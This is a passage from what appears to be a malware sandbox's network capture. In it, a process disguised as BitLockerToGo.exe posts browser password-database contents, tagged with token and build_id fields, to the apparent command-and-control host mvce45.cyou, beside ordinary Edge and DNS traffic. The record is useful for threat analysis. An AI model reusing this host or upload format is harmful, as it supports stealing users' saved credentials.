                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:33 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  21192.168.2.84975494.245.104.564431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:33 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:33 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:32 GMT
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                  Set-Cookie: ARRAffinity=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                  Set-Cookie: ARRAffinitySameSite=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                  Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  22192.168.2.84975749.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:34 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 3165
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:34 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------EHDGIJJDGCBKFIDHIEBKCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:35 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  23192.168.2.84976349.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 68733
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------JDAFIEHIEGDHIDGDGHDHContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------JDAFIEHIEGDHIDGDGHDHContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------JDAFIEHIEGDHIDGDGHDHCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:36 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  24192.168.2.849784172.64.41.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b532fa342df-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  25192.168.2.849778162.159.61.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b537f275e60-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  26192.168.2.849788162.159.61.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b538f187c9a-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 22 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom"PC)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  27192.168.2.84977449.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 262605
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
